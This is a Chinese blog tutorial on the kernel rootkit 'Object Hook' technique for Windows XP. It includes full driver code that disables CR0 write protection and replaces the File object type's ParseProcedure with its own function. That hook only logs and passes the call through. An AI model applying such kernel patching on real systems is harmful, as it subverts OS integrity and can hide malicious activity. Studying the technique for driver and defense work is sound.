[内核安全3]内核态Rootkit之Object Hook

最新推荐文章于 2023-05-19 11:04:35 发布
最新推荐文章于 2023-05-19 11:04:35 发布
阅读量580 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: Windows驱动编程 病毒技术
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37232329/article/details/111395770

Object Hook是通过挂钩OBJECT_HEADER其中一些字段来实现的。在Windows中通过对象管理器来管理所有对象,可以使用WinObj来观察一下WinXP SP3下的对象类型:

Windows中包含三种对象:

  • 执行体对象
  • 内核对象
  • GDI/User对象

这里我们挂钩的就是执行体对象。

这里实验机器是WinXP SP3, 首先来看一下进程对象的数据结构:

然后随便找一个进程对象,寻找他的对象结构体,比如之前打开的WinObj进程,

通过!object命令查找到了其进程对象的基本信息,并找到了对应ObjectHeader位置,接下去看一下其头部有什么内容:

看到了吧,这就是WinObj进程的头部,看到其中的Type字段,这就是那张简图中的对象类型,我们最终是要找到其中的方法并对其挂钩。

上图就是找到最终方法的步骤,其中重要字段我已经框出。这里演示挂钩ParseProcedure方法。

在这里可以清晰看到该方法拥有的形参类型,由此我定义如下函数指针:

Object Hook挂钩的整体步骤如下:

  1. 通过ZwOpenFile打开具体某个文件并获取对应文件句柄
  2. 通过ObReferenceObjectByHandle获取文件句柄对应的文件对象指针
  3. 通过文件对象指针获取文件对象的头部,即OBJECT_HEADER
  4. 通过对象头部获取其对象类型字段
  5. 通过类型字段替换其中的ParseProcedure字段为我们自己的函数
  6. 挂钩完成

由于关于对象的几个关键数据结构在wdk头文件中都是没有定义的,所以需要自己定义,网上有很多关于这方面的介绍,实在不行,可以通过windbg查看其数据成员:

各个数据成员在windbg下都是可以清楚看到的。给出如下定义:

typedef struct _OBJECT_TYPE_INITIALIZER {
	USHORT Length;
	BOOLEAN UseDefaultObject;
	BOOLEAN CaseInsensitive;
	ULONG InvalidAttributes;
	GENERIC_MAPPING GenericMapping;
	ULONG ValidAccessMask;
	BOOLEAN SecurityRequired;
	BOOLEAN MaintainHandleCount;
	BOOLEAN MaintainTypeList;
	POOL_TYPE PoolType;
	ULONG DefaultPagedPoolCharge;
	ULONG DefaultNonPagedPoolCharge;
	PVOID DumpProcedure;
	PVOID OpenProcedure;
	PVOID CloseProcedure;
	PVOID DeleteProcedure;
	PVOID ParseProcedure;
	PVOID SecurityProcedure;
	PVOID QueryNameProcedure;
	PVOID OkayToCloseProcedure;
} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER;

typedef struct _OBJECT_TYPE {
	ERESOURCE Mutex;
	LIST_ENTRY TypeList;
	UNICODE_STRING Name;
	PVOID DefaultObject;
	ULONG Index;
	ULONG TotalNumberOfObjects;
	ULONG TotalNumberOfHandles;
	ULONG HighWaterNumberOfObjects;
	ULONG HighWaterNumberOfHandles;
	OBJECT_TYPE_INITIALIZER TypeInfo;
#ifdef POOL_TAGGING 
	ULONG Key;
#endif 
} OBJECT_TYPE, *POBJECT_TYPE;

typedef struct _OBJECT_CREATE_INFORMATION {
	ULONG Attributes;
	HANDLE RootDirectory;
	PVOID ParseContext;
	KPROCESSOR_MODE ProbeMode;
	ULONG PagedPoolCharge;
	ULONG NonPagedPoolCharge;
	ULONG SecurityDescriptorCharge;
	PSECURITY_DESCRIPTOR SecurityDescriptor;
	PSECURITY_QUALITY_OF_SERVICE SecurityQos;
	SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
} OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION;

typedef struct _OBJECT_HEADER {
	LONG PointerCount;
	union {
		LONG HandleCount;
		PSINGLE_LIST_ENTRY SEntry;
	};
	POBJECT_TYPE Type;
	UCHAR NameInfoOffset;
	UCHAR HandleInfoOffset;
	UCHAR QuotaInfoOffset;
	UCHAR Flags;
	union
	{
		POBJECT_CREATE_INFORMATION ObjectCreateInfo;
		PVOID QuotaBlockCharged;
	};

	PSECURITY_DESCRIPTOR SecurityDescriptor;
	QUAD Body;
} OBJECT_HEADER, *POBJECT_HEADER;

接下去通过调试来看一下ParseProcedure字段到底调用了哪一个函数:

看到了吧,其最终调用的实际上就是IopParseFile。

最后贴出完整代码:

#include <ntddk.h>

#define OBJECT_TO_OBJECT_HEADER(o) \
	CONTAINING_RECORD((o), OBJECT_HEADER, Body)


typedef struct _OBJECT_TYPE_INITIALIZER {
	USHORT Length;
	BOOLEAN UseDefaultObject;
	BOOLEAN CaseInsensitive;
	ULONG InvalidAttributes;
	GENERIC_MAPPING GenericMapping;
	ULONG ValidAccessMask;
	BOOLEAN SecurityRequired;
	BOOLEAN MaintainHandleCount;
	BOOLEAN MaintainTypeList;
	POOL_TYPE PoolType;
	ULONG DefaultPagedPoolCharge;
	ULONG DefaultNonPagedPoolCharge;
	PVOID DumpProcedure;
	PVOID OpenProcedure;
	PVOID CloseProcedure;
	PVOID DeleteProcedure;
	PVOID ParseProcedure;
	PVOID SecurityProcedure;
	PVOID QueryNameProcedure;
	PVOID OkayToCloseProcedure;
} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER;

typedef struct _OBJECT_TYPE {
	ERESOURCE Mutex;
	LIST_ENTRY TypeList;
	UNICODE_STRING Name;
	PVOID DefaultObject;
	ULONG Index;
	ULONG TotalNumberOfObjects;
	ULONG TotalNumberOfHandles;
	ULONG HighWaterNumberOfObjects;
	ULONG HighWaterNumberOfHandles;
	OBJECT_TYPE_INITIALIZER TypeInfo;
#ifdef POOL_TAGGING 
	ULONG Key;
#endif 
} OBJECT_TYPE, *POBJECT_TYPE;

typedef struct _OBJECT_CREATE_INFORMATION {
	ULONG Attributes;
	HANDLE RootDirectory;
	PVOID ParseContext;
	KPROCESSOR_MODE ProbeMode;
	ULONG PagedPoolCharge;
	ULONG NonPagedPoolCharge;
	ULONG SecurityDescriptorCharge;
	PSECURITY_DESCRIPTOR SecurityDescriptor;
	PSECURITY_QUALITY_OF_SERVICE SecurityQos;
	SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
} OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION;

typedef struct _OBJECT_HEADER {
	LONG PointerCount;
	union {
		LONG HandleCount;
		PSINGLE_LIST_ENTRY SEntry;
	};
	POBJECT_TYPE Type;
	UCHAR NameInfoOffset;
	UCHAR HandleInfoOffset;
	UCHAR QuotaInfoOffset;
	UCHAR Flags;
	union
	{
		POBJECT_CREATE_INFORMATION ObjectCreateInfo;
		PVOID QuotaBlockCharged;
	};

	PSECURITY_DESCRIPTOR SecurityDescriptor;
	QUAD Body;
} OBJECT_HEADER, *POBJECT_HEADER;


POBJECT_TYPE pType = NULL;
POBJECT_HEADER pObjectHdr = NULL;
PVOID pOldParseProcedure = NULL;

VOID
Unload(
IN PDRIVER_OBJECT pDriverObject
)
{
	KdPrint(("卸载驱动!\n"));
}

typedef NTSTATUS(NTAPI *PFNPARSEPROCEDURE)(
	IN PVOID ParseObject,
	IN PVOID ObjectType,
	IN OUT PACCESS_STATE AccessState,
	IN KPROCESSOR_MODE AccessMode,
	IN ULONG Attributes,
	IN OUT PUNICODE_STRING CompleteName,
	IN OUT PUNICODE_STRING RemainingName,
	IN OUT PVOID Context OPTIONAL,
	IN PSECURITY_QUALITY_OF_SERVICE SecurityQos OPTIONAL,
	OUT PVOID *Object
	);

NTSTATUS NewParseProcedure(
	IN PVOID ParseObject,
	IN PVOID ObjectType,
	IN OUT PACCESS_STATE AccessState, 
	IN KPROCESSOR_MODE AccessMode,
	IN ULONG Attributes,
	IN OUT PUNICODE_STRING CompleteName, 
	IN OUT PUNICODE_STRING RemainingName,
	IN OUT PVOID Context OPTIONAL,
	IN PSECURITY_QUALITY_OF_SERVICE SecurityQos OPTIONAL,
	OUT PVOID *Object
	)
{
	NTSTATUS status;
	KdPrint(("Object is hooked!\n"));
	PFNPARSEPROCEDURE pfnParseProcedure = NULL;

	pfnParseProcedure = (PFNPARSEPROCEDURE)pOldParseProcedure;
	status = pfnParseProcedure(ParseObject, ObjectType, AccessState, AccessMode,
		Attributes, CompleteName, RemainingName, Context, SecurityQos, Object);

	return(status);
}


NTSTATUS 
ObjectHook()
{
	NTSTATUS status;
	HANDLE hFile;
	UNICODE_STRING ustrName;
	OBJECT_ATTRIBUTES objAttr;
	IO_STATUS_BLOCK ioStatusBlock;
	PVOID pObject = NULL;

	// 其中xxxx是文件
	RtlInitUnicodeString(&ustrName, L"\\Device\\HarddiskVolume1\\1.txt");
	InitializeObjectAttributes(&objAttr, &ustrName, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, 0, NULL);

	// 打开C盘下的文件
	status = ZwOpenFile(&hFile, GENERIC_ALL, &objAttr, &ioStatusBlock, 0, FILE_NON_DIRECTORY_FILE);
	if (!NT_SUCCESS(status))
	{
		return(status);
	}
	// 获取1.txt文本文件的对象指针
	status = ObReferenceObjectByHandle(hFile, GENERIC_ALL, NULL, KernelMode, &pObject, NULL);
	if (!NT_SUCCESS(status))
	{
		return(status);
	}
	// 获取指向_OBJECT_HEADER对象头部指针
	pObjectHdr = OBJECT_TO_OBJECT_HEADER(pObject);
	// 获取其中的对象类型
	pType = pObjectHdr->Type;
	// 保存打开创建方面的例程
	pOldParseProcedure = pType->TypeInfo.ParseProcedure;
	
	// 关闭写保护
	__asm
	{
		cli 
		mov eax, cr0
		and eax, not 10000h
		mov cr0, eax 
	}
	// 进行HOOK操作
	pType->TypeInfo.ParseProcedure = NewParseProcedure;
	// 打开写保护
	__asm
	{
		mov eax, cr0 
		or eax, 10000h
		mov cr0, eax 
		sti 
	}
	// 关闭文件
	status = ZwClose(hFile);

	return(status);
}

NTSTATUS 
DriverEntry(
	IN PDRIVER_OBJECT pDriverObject, 
	IN PUNICODE_STRING pRegistryPath
	) 
{
	KdPrint(("加载驱动!\n"));
	pDriverObject->DriverUnload = Unload;
	ObjectHook();
	

	return(STATUS_SUCCESS);
}

最终的实现效果:

对了, 可能有人会对这个产生困惑,这是一个路径名。

在内核态下使用路径名都是\Device\开头的,这些叫做设备名,在用户态下的想要访问驱动设备用的都是符号链接名, 一般调用IoCreateSymbolicLink将符号链接名和设备名关联起来。可以想象成符号链接名是设备名的软链接,这样应该更好理解。符号链接名也就是我们在用户态下看到的名称。符号链接名一般采用\??\开头的格式。也就是说如果某个驱动设备希望被用户态进程访问到,就必须提供一个符号链接名以供进程访问。

实际上我们在Windows中看到的盘符都是一个个逻辑设备。其真实的物理设备就是硬盘。Windows将其抽象成了很多个逻辑设备。比如C盘,就是其符号链接名是\??\C:

来看看起真实的设备名:

看见了吧,就是\Device\HarddiskVolume1。由于我们的驱动是在内核态运行的。所以必须使用真实的设备名, 所以上面那个路径实际上就是C:\\1.txt。

(完)

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

内核Hook资料-Object HOOK
12-31
内核Hook资料-Object HOOK
内核对象HOOK
weixin_45050926的博客
02-03 386
内核对象HOOK 内核对象的结构 首先我们来了解一下内核对象的基本结构,每一个内核对象都是由对象头和对象体组成,对象头都是一样的,对象体 不同的内核对象是不一样的。该结构体请参考内核结构体。 //0x20 bytes (sizeof) struct _OBJECT_HEADER { LONG PointerCount; ...
保护内核对象—对象挂钩(Object Hook
qq_42814021的博客
10-17 1811
内核对象 每个内核对象实际上都是一个内存块,它是由操作系统内核分配的,并且只能由操作系统内核访问。这个内存块是一个数据结构,它的成员维护着和这个对象相关的信息。但是应用程序不能直接访问和修改这些数据结构,它们需要通过句柄。 先通过系统调用打开/创建内核对象,让当前进程与目标对象之间建立起连接,此时就会返回一个句柄。然后调用Windows提供的一系列API函数就能访问这些内核对象。所以句柄其实相当于一个接口,Ring3层通过它来访问Ring0层的一些数据结构。 内核对象由对象头和对象体组成。 当应用程序打开内
[Windows 驱动开发] object hook
LYSM
08-30 701
内核对象种类 名称 类型 Job、Directory 对象目录中的路径 SymbolLink 符号链接 Section 内存映射文件 Port LPC端口 IoCompletion Io完成端口 File 文件(并非专指磁盘文件) Mutex、Event、Semaphore、Timer 同步对象 Key 注册表中的键 Token 用户/组令牌 Process、Thread 进程线程 Pipe 管道 Mailslot 邮件槽 Debug 调试端口
objectHook简单介绍
o330820350的专栏
09-12 1158
标 题: 【原创】objectHook简单介绍 作 者: ggdd 时 间: 2011-01-15,13:13:20 链 接: http://bbs.pediy.com/showthread.php?t=128161 其实这东西很多大牛多玩腻了的东西,看下论坛上比较少这类的,就来献献丑,科普一下 大牛们直接 可以飘过,这东西主要是自我复习一下OBJECT的一些知识,技术这东西久了不弄
深入解析Rootkit技术:内核钩子与保护模式
其分类主要包括内核态Rootkit和用户态Rootkit,根据本专题,我们将关注内核态Rootkit。 #### 二、内核态Rootkit相关技术 ##### 1. 内核Hook技术 内核Hook技术是一种通过修改操作系统内部数据结构或函数入口,来...
RootKit深度解析:Object Hook技术探秘
首先,作者提到了RootKit的一个独特之处——将自身作为资源嵌入到用户模式程序中,这样可以增加逆向工程的难度,因为仅逆向用户模式程序而不涉及内核部分,很难发现RootKit的存在。同时,该RootKit使用用户程序代码...
内核级后门Rootkit技术
11-18
1. **用户态(Ring3)到内核态(Ring0)的转变**:早期的Rootkit主要运行在用户态,但随着安全技术的进步,这种类型的Rootkit很容易被检测到。因此,开发者开始尝试将Rootkit植入操作系统内核中,利用更深层次的系统...
全面解析rootkit及其多种hook技术
object hook(对象钩子) 对象钩子通常涉及到操作系统的内核对象,例如进程、线程或文件。通过hook这些对象,Rootkit可以拦截对其的调用或操作。这种技术可以用来隐藏恶意进程或文件,使它们在系统中不可见。 ###...
RootKit技术揭秘:ObjectHook与信息隐藏策略
在本文档中,作者深入探讨了RootKit的一个具体实现——objecthook,这是一种在内核级别对对象创建和访问进行拦截的方法。 亮点一,RootKit被嵌入到用户模式程序的资源中,以此来隐藏自身。这种方法增加了检测的难度...
Object Hook 简单介绍
liujiayu2的专栏
07-18 1515
其实这东西很多大牛多玩腻了的东西,看下论坛上比较少这类的,就来献献丑,科普一下 大牛们直接 可以飘过,这东西主要是自我复习一下OBJECT的一些知识,技术这东西久了不弄容易忘记,所以 拿出来跟和我一样菜的菜鸟们分享一下。如果有不对的地方欢迎大家指正,这样对于自己也进步得 快点,多多交流,互相学习,水平才能提高得快。    第一我们先看下OBJECT的组成 主要是3部分 如下图
object hook
04-21 4729
object是什么东西?光从名字上面不难看出,对象。这篇是关于内核对象的hook,为什么要hook他呢,额,这个嘛。因人而异。 看雪上面有很详细的说明,本菜鸟算是抄袭过来而已。版权归看雪所有。 objectHook简单介绍 windbg截图为XP SP3系统。 _OBJECT_HEADER结构: typedef struct _OBJECT_HEADER
object_Hook相关知识
kernweak的博客
09-03 730
前置知识 首先,分析OBJECT内核对象) 先找到一个进程内核对象的地址,使用!process 0 0查看 PROCESS 885de030 SessionId: 1 Cid: 0700 Peb: 7ffd9000 ParentCid: 0418 DirBase: 7f3602e0 ObjectTable: 98a8c548 HandleCount: 60...
通过trace stack检测内核函数是否被hook
TCP/IP
04-30 7478
Rootkit需要及时发现是否有程序抓它,而侦测程序本身也需要时刻警惕Rootkit的注入,左右互搏。 侦测程序发现Rootkit的手段是非常多的,前面我介绍过通过内核text段互相调用的地址范围来静态扫描的方式: https://blog.csdn.net/dog250/article/details/105474909 本文我将介绍一种动态trace stack的方式来捕捉内核函数的调用异常。...
64位内核第二讲,进程保护之对象钩子
weixin_30484739的博客
02-01 473
         64位内核第二讲,进程保护. 一丶什么是保护. 什么是保护.比如我们安装了xxx杀毒软件.那么此时你用任务管理器关闭.是关闭不了的.原因是内核已经做了保护. 那么去掉保护的前提就是你要给自己的软件做保护. 比如我们给计算器做保护.例如下图. 做保护.以前的病毒作者.都是想要退出xxx杀毒软件.什么方法都能做.所以杀软为了防止这一情况发生,直接把打开进程的AP...
Linux内核Rootkit攻击与度量对象提取
weixin_45027952的博客
05-19 828
介绍了Linux内核Rootkit攻击以及系统调用表的提取
一个简单的Object Hook的例子(win7 32bit)
08-29 237
Object Hook简单的来说就是Hook对象,这里拿看雪上的一个例子,因为是在win7 32位上的,有些地方做了些修改。 _OBJECT_HEADER: kd> dt _OBJECT_HEADERnt!_OBJECT_HEADER +0×000 PointerCount : Int4B +0×004 HandleCount : Int4B ...
【转】内核Rootkit技术入门(二)
annhf的专栏
05-04 1236
本文将向读者介绍如何将编译好的驱动程序运行起来并察看它的调试语句给出的消息。换句话说,我们要做的是最简单的调试工作。一、驱动程序的加载和执行当我们开发Rootkit的时候,经常需要改变其功能,这时经常重复加载、运行、测试、停止和卸载这一系列的动作。加载和运行驱动程序的方法很多,我们这里介绍的是最简单的一种——利用工具软件InstDrv。InstDrv是一款非常小巧的工具,它的.zip压缩包
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值